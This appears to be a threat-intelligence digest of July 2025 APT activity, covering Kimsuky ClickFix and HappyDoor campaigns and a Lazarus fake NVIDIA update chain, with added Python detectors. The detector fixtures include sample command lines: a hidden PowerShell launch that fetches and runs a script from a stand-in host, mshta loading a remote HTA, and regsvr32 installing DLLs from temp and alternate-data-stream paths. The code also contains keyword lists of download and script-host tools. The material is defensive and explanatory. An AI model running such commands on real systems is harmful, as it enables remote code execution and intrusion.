July 2025 Major APT Group Trends

Purpose and Scope

This report covers state-led threat groups presumed to conduct cyber espionage or sabotage with the support of particular governments. For convenience, these groups are referred to as advanced persistent threat (APT) groups. The report therefore does not cover cybercriminal groups whose aim is financial profit.

We compiled the analyses of APT groups published by security companies and institutions, including AhnLab, during the previous month; some APT groups may not be covered.

Names and classification criteria vary between security companies and researchers; this report uses the well-known threat actor names from the AhnLab Threat Intelligence Platform (ATIP).

Major APT Group Trends by Region

1) North Korea

North Korean APT groups actively used the ClickFix technique and carried out DLL side-loading through OLE objects embedded in Hangul Word Processor (HWP) documents.

Kimsuky

The Kimsuky group utilized the ClickFix tactic to launch a multi-stage spear phishing attack targeting diplomats and security experts.

Case 1.

Time: January, March, and June 2025

Targets:
· Diplomatic, security, international politics, and defense research institutes and portal users in South Korea
· Experts in diplomacy, security, and international politics in South Korea

Initial Access:
· Emails disguised as coming from the media, government officials, or police investigators
· After gaining trust with fake interview requests and meeting invitations, the attackers sent malicious links and documents

Vulnerability Exploited: None

Malware and Tools:
· BabyShark: Kimsuky's main malware family, covering various script-based execution methods
· QuasarRAT: Used as the final payload in the ClickFix campaign (Proofpoint)
· Malicious .vbs script: Includes C2 connection, information collection, and scheduled task registration features
· .lnk file (disguised with an Edge icon): Shortcut file that prompts the user to click
· AutoIt script (HncUpdateTray.exe): Executable that steals user information

Technique:
· ClickFix: Prompts users to execute commands manually through psychological manipulation
· Email spoofing and social engineering (spear phishing)
· Avoiding false detection through multilingual PDF manuals
· Obfuscating PowerShell code by reversing it
· C2 communication after executing the .vbs and .lnk files
· Maintaining persistence via scheduled task registration
· Keylogging and information gathering

Damage:
· Theft of user information
· Continuous C2 connection to infected systems
· Collection of keylogging records
· Successful evasion of security controls and detection

Description:
· Kimsuky employed the ClickFix technique, a tactic that prompts users to enter PowerShell commands themselves.
· In January 2025, the group distributed a .vbs script via an email disguised as an interview request.
· In March, it sent a manual that included Code.txt via an email impersonating a U.S. national security advisor.
· The ClickFix technique is designed to make users believe they are troubleshooting, leading them to execute malicious commands manually.
· The lures took various forms, such as a fake portal login page and a job search site for the defense industry.
· After infection, the threat actor's scheduled tasks are registered, C2 communication is established, and information is collected automatically.
· Related infrastructure (IP addresses, domains) is distributed across multiple countries, including Korea, China, and Vietnam.
· In some cases, cloud-based file delivery services such as Proton Drive and Google Drive are used.

Source: Analysis of the threat case of Kimsuky group using 'ClickFix' tactic [1]

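The ClickFix case above rests on two observable traits: the victim pastes a PowerShell command into the Run dialog or a console, and the command hides its real content by reversing a string literal before feeding it to Invoke-Expression. The following Python is an added detection example, not code from the AhnLab report or the cited Genians analysis. It scores process-creation records for that combination and un-reverses the literal so an analyst can read what would have run. The records, field names (Sysmon Event ID 1 style) and the reversed literal are constructed for the example; a real EDR's process telemetry would carry the same fields under different names.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 field names); not real telemetry.
SAMPLE_EVENTS = [
    {   # ClickFix-style launch: hidden window, no profile, reversed literal fed to iex
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": ("powershell -w hidden -nop -c \"$s='sbv.a/dilavni.elpmaxe//:ptth tseuqeRbeW-ekovnI';"
                        "$r=-join $s[-1..-($s.Length)];iex $r\""),
    },
    {   # Benign admin script started the same way by a user; must not fire
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -NoProfile -File C:\Scripts\backup.ps1",
    },
]

# Cmdlets and LOLBins that a benign script never hides inside a reversed literal.
REVERSE_MARKERS = ("invoke-webrequest", "invoke-expression", "downloadstring", "iwr ", "iex ",
                   "schtasks", "wscript", "mshta", "regsvr32")

# Individually weak indicators that together characterise a ClickFix launch.
CLICKFIX_FLAGS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "reverse_index": re.compile(r"\[-1\s*\.\.\s*-"),          # the $s[-1..-($s.Length)] idiom
    "array_reverse": re.compile(r"\[array\]::reverse", re.I),  # the other common reversal idiom
}

STRING_LITERAL = re.compile(r"'([^']{12,})'")   # single-quoted literals long enough to hold a command


def decode_reversed_literals(cmdline):
    """Reverse each long quoted literal and keep those that then contain a marker."""
    decoded = []
    for literal in STRING_LITERAL.findall(cmdline):
        reversed_text = literal[::-1]
        if any(marker in reversed_text.lower() for marker in REVERSE_MARKERS):
            decoded.append(reversed_text)
    return decoded


def analyze_event(event):
    """Score one process-creation record; the reasons are returned so an analyst can triage."""
    cmdline = event["CommandLine"]
    reasons = [name for name, pattern in CLICKFIX_FLAGS.items() if pattern.search(cmdline)]
    decoded = decode_reversed_literals(cmdline)
    if decoded:
        reasons.append("reversed_payload")
    # ClickFix tells the victim to paste into the Run dialog or a terminal, so explorer.exe
    # is the usual parent; it is only counted once something else already looks wrong.
    if reasons and event["ParentImage"].lower().endswith("\\explorer.exe"):
        reasons.append("explorer_parent")
    return {"suspicious": bool(decoded) or len(reasons) >= 3, "reasons": reasons, "decoded": decoded}


def scan(events):
    """Return (index, verdict) for every record that trips the rule."""
    flagged = []
    for index, event in enumerate(events):
        verdict = analyze_event(event)
        if verdict["suspicious"]:
            flagged.append((index, verdict))
    return flagged


if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_EVENTS):
        print(f"event {index}: {verdict['reasons']} decoded={verdict['decoded']}")
```

A decoded literal is treated as sufficient on its own, while the window, profile and parent flags only add up to a verdict together, which keeps routine `-NoProfile` scripts quiet. On the host itself, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a useful corroborating artefact, since it retains what the user pasted.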
The Kimsuky group targeted South Korea by distributing malware disguised as a Bandizip installer and collected sensitive information through the VMP-protected HappyDoor backdoor.

Case 2.

Time: April 18, 2025

Target:
· South Korea
· Specifically government, media, education and research institutions, and think tanks

Initial Access:
· Distribution of a malicious .exe file disguised as the Bandizip installer
· Installs the genuine Bandizip program while executing a malicious DLL and a remote script
· Remote code execution through mshta and regsvr32

Vulnerability Exploited: None

Malware and Tools:
· HappyDoor: A VMP-protected backdoor that collects system information and exfiltrates 6 types of information
· ut_happy (x64).dll: The DLL implementing HappyDoor, which runs multiple commands via regsvr32
· Uso1Config.conf: Script file that stores PowerShell-based attack commands
· mshta: Loads and executes remote HTML scripts
· regsvr32: Registers and executes malicious DLLs
· bat script: Self-deletes files and cleans up the local environment
· VBScript: Collects system information and directory file listings and sends them to the C2

Tactic:
· Disguising malware as an installer (social engineering)
· Loading and executing scripts stage by stage
· Collecting information using PowerShell and VBScript
· Using VMP virtualization to protect the backdoor and hinder analysis
· Concealment using the registry and alternate data streams (ADS)
· Executing a multi-stage DLL through regsvr32 parameter combinations
· Transmitting commands and data via C2 communication
· Ensuring persistence by creating a scheduled task

Damage:
· Theft of user information (account, system, IP, installed anti-malware, etc.)
· Collection of key documents (.hwp, .doc, .pdf, etc.) from directories
· Keylogging, screenshots, audio recording, enumeration of external devices, and file collection
· Backdoor for continuous remote control

Description:
· The threat actor delivered the genuine installation program and a malicious DLL together through a disguised .exe file posing as the Bandizip installer
· When the .exe file is executed, the DLL is installed, initialized, and run in three stages via regsvr32
· The script collects user information and transmits it to a specific C2 URL
· HappyDoor is packed with VMProtect, which makes it difficult to detect and analyze, and includes various information collection features

Source: Analysis of the HappyDoor backdoor attack by the APT-C-55 (Kimsuky) group based on heavy VMP packing [2]

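The HappyDoor chain above is built from signed Windows utilities (mshta fetching a remote script, regsvr32 installing a DLL in several stages) and hides components in alternate data streams, so the useful detection surface is the command line rather than the file hash. The following Python is an added detection example, not code from the AhnLab report or the cited analysis. It classifies process-creation records for exactly those traits and correlates a loader stage with a DLL stage in the same batch. All records, paths and file names are constructed for the example.

```python
import re

# Constructed process-creation records; the paths and file names are invented.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe",            # stage one: remote HTA loader
     "CommandLine": "mshta http://update.example.invalid/init.hta"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",         # stage two: silent install from Temp
     "CommandLine": r"regsvr32 /s /i C:\Users\user\AppData\Local\Temp\stage.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",         # stage three: DLL hidden in an ADS
     "CommandLine": r"regsvr32 /s /n /i:init C:\Users\Public\Documents\notes.txt:stage.dll"},
    {"Image": r"C:\Windows\System32\regsvr32.exe",         # ordinary vendor registration: no hit
     "CommandLine": r'regsvr32 /s "C:\Program Files\Common Files\Vendor\vendor.dll"'},
]

USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Windows\\Temp)\\", re.I)
ADS_PATH = re.compile(r"\\[^\\:\s\"']+:[A-Za-z0-9_.$-]+")   # ...\file.ext:streamname (drive colons excluded)
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.I)
REGSVR_SILENT = re.compile(r"(?:^|\s)/s\b", re.I)
REGSVR_INSTALL = re.compile(r"(?:^|\s)/i(?::|\b)", re.I)   # /i alone or /i:<string> for DllInstall
INLINE_SCRIPT = re.compile(r"\b(?:javascript|vbscript):", re.I)


def classify(event):
    """Return the list of LOLBin indicators found in one record (empty means clean)."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    hits = []
    if image == "mshta.exe":
        if REMOTE_URL.search(cmd):
            hits.append("mshta_remote_script")
        if INLINE_SCRIPT.search(cmd):
            hits.append("mshta_inline_script")
    elif image == "regsvr32.exe":
        if REGSVR_SILENT.search(cmd) and REGSVR_INSTALL.search(cmd):
            hits.append("regsvr32_silent_install")
        if USER_WRITABLE.search(cmd):
            hits.append("regsvr32_user_writable_dll")
        if REMOTE_URL.search(cmd):
            hits.append("regsvr32_remote_scriptlet")
    if ADS_PATH.search(cmd):          # applies to any image: a stream path is never normal here
        hits.append("alternate_data_stream_path")
    return hits


def find_staged_chain(events):
    """True when one batch (same host, short window) shows both a remote-script loader
    and a regsvr32 DLL stage, the two-step pattern in the case above."""
    hits = [hit for event in events for hit in classify(event)]
    return any(h.startswith("mshta_") for h in hits) and any(h.startswith("regsvr32_") for h in hits)


if __name__ == "__main__":
    for index, event in enumerate(SAMPLE_EVENTS):
        print(index, classify(event))
    print("staged chain:", find_staged_chain(SAMPLE_EVENTS))
```

The vendor registration in the last record is silent but neither uses /i nor lives in a user-writable directory, so it produces no hit; that pairing is what keeps the rule from firing on routine software installs. Sysmon Event ID 15 (FileCreateStreamHash) records the creation of a named stream and is the natural second source for the ADS indicator.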
Lazarus

The Lazarus group posed as a job interview evaluation and built an attack chain disguised as an NVIDIA update, using it to execute a Python-based malicious script and multi-stage tools.

Case 1.

Time: Unknown

Target: General users, who are led to execute malicious scripts disguised as NVIDIA updates

Initial Access:
· Links to a disguised recruitment assessment and fake camera access requests, after which users are asked to copy commands
· Prompting users to execute an update command via a spoofed NVIDIA domain

Vulnerability Exploited: None

Malware and Tools:
· VBS script: Downloads a malicious archive and launches a Python environment
· Python script: Heavily obfuscated; includes credential theft, remote access, and data exfiltration features
· WebBrowserPassView: Browser credential theft tool
· MailPassView: Email credential theft tool
· MeshAgent: Agent installed for remote control and persistence
· PyInstaller EXE: Exfiltrates files and secrets over FTP; persists through a scheduled task disguised as ChromeUpdate.exe
· Browser extension and local cryptocurrency folders: Collects and exfiltrates cryptocurrency-related information

Tactic:
· Phishing based on psychological social engineering: trust-based baiting with a job interview
· Domain spoofing (NVIDIA): users copy a modified command that executes malicious code
· Obfuscated Python script
· Theft of browser/email credentials, installation of a remote agent, scheduled task persistence, and collection and exfiltration of cryptocurrency information

Damage:
· Theft of browser and email credentials → exfiltration to the C2 server
· Remote control and persistence (MeshAgent, scheduled task)
· Collection and transmission of cryptocurrency-related information → possible theft of the user's sensitive data and assets
· Details of the breach, such as the specific scale of data exfiltration or system paralysis, are not mentioned

Description:
· Tricks users with a fake recruitment evaluation screen and prompts them to copy and execute commands
· Multi-stage attack that runs a Windows VBS script and then Python, covering credential theft, remote access, scheduled task persistence, and cryptocurrency information theft
· An advanced attack chain involving sophisticated impersonation and luring of targets, similar to Lazarus's "DeceptiveDevelopment" campaign

Source: Lazarus' latest tactics: Deceptive development and ClickFix [3]

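Both Kimsuky cases and the Lazarus case above end with a scheduled task for persistence, and the Lazarus task masquerades as a browser updater (ChromeUpdate.exe). Task definitions are plain XML, so they can be audited offline. The following Python is an added defensive example, not code from the AhnLab report or the cited Gen Digital post. It parses task XML in the shape that `schtasks /query /tn <name> /xml` exports (XML declaration omitted here) and flags an action that runs from a user-writable directory, an updater-looking binary outside Program Files or Windows, or a script host as the action. The task names and paths are constructed except for ChromeUpdate.exe, which the case names; the Google updater task is included as a benign control and is assumed to represent a typical legitimate entry.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definitions in the shape of `schtasks /query /xml` output (declaration omitted).
SAMPLE_TASKS = {
    r"\GoogleUpdateTaskMachineUA": r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Google</Author></RegistrationInfo>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</Command>
      <Arguments>/ua /installsource scheduler</Arguments>
    </Exec>
  </Actions>
</Task>""",
    r"\ChromeUpdate": r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>user</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\ChromeUpdate.exe</Command></Exec>
  </Actions>
</Task>""",
    r"\SystemUpdateCheck": r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\wscript.exe</Command>
      <Arguments>//B C:\ProgramData\sync\launch.vbs</Arguments>
    </Exec>
  </Actions>
</Task>""",
}

USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Windows\\Temp)\\", re.I)
TRUSTED_ROOT = re.compile(r"^[A-Z]:\\(?:Program Files(?: \(x86\))?|Windows)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "python.exe", "pythonw.exe"}


def audit_task(xml_text):
    """Return the findings for one task definition (an empty list means nothing suspicious)."""
    root = ET.fromstring(xml_text.strip())
    findings = []
    for action in root.findall(".//t:Actions/t:Exec", NS):
        command = action.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        arguments = action.findtext("t:Arguments", default="", namespaces=NS)
        exe = command.rsplit("\\", 1)[-1].lower()
        # Legitimate updaters and services run from Program Files or Windows, not from profiles.
        if USER_WRITABLE.search(command) or USER_WRITABLE.search(arguments):
            findings.append("user_writable_path")
        # A binary named like an updater that does not live under a trusted root is masquerading.
        if "update" in exe and not TRUSTED_ROOT.match(command):
            findings.append("updater_name_outside_trusted_root")
        # A script host as the action means the real payload is in the arguments, not the binary.
        if exe in SCRIPT_HOSTS:
            findings.append("script_host_action")
    return findings


def audit_all(tasks):
    """Map task name to findings for every task that produced at least one finding."""
    report = {}
    for name, xml_text in tasks.items():
        findings = audit_task(xml_text)
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for name, findings in audit_all(SAMPLE_TASKS).items():
        print(name, findings)
```

On a live host the same XML sits as one file per task under C:\Windows\System32\Tasks, so the audit can be run over a directory listing rather than per-task exports; Security log event 4698 (a scheduled task was created) carries the task content as well and gives the creation time, which is the natural place to spot a new task appearing right after a script host or installer ran.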

[1] https://www.genians.co.kr/en/blog/threat_intelligence/suky-castle?hsCtaAttrib=191277000884

[2] https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507111&idx=1&sn=aa2c1910a15aed642f0daf7ef8e38699

[3] https://www.gendigital.com/blog/insights/research/deceptive-nvidia-attack